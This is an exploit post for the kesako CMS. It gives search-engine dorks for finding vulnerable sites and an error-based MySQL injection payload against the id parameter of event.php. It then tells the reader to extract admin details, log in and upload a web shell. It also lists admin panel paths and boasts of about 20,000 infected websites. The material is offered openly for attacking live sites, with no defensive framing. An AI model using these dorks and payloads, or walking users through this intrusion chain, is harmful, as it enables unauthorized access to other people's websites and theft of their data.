facebook facebook twitter rss

kesako script SQL Injection

Author: Microsoft-Dz , Published: 21-05-2014
kesako script SQL Injection
===================================================================
####################################################################



#.:. Exploit Title : kesako Script Sql Injection #


# .:. Author : Microsoft-dz #



#.:. Contact : [ifyoucanbebeme@gmail.com] #



#.:. Dork : intext:powered by [kesako] inurl:/event.php?id= #



#.:. Dork 2 : intext:powered by [kesako] #



#.:. Tested on : win&linux #



#.:. Vendor's Website : http://www.kesako.ch/cms/ #



#.:. Date : [2014/5/19] #

####################################################################



VULNERABILITY



##############

[~] VULNERABILITY}~~







[~] www.site.com/modules/event.php?id=[SQL INJECTION]

[~] www.site.com/modules/event.php?id=[SQL INJECTION]



#########



P0C



#########



Type: String Mysql Injection







http://SITE/modules/event.php?id=[SQL INJECTION]







http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1



####################################################################

1- Get Admin Infos

2- then login and upload your shell


Enjoy

About #20K Infected Websites :v



You Can Find The Admin Panel @ http://site/cms/admin

or http://site/cms/user/

or http://site/cms/login/

#########################################################################
Tnx: R3Z0Uk4

Like us on Facebook :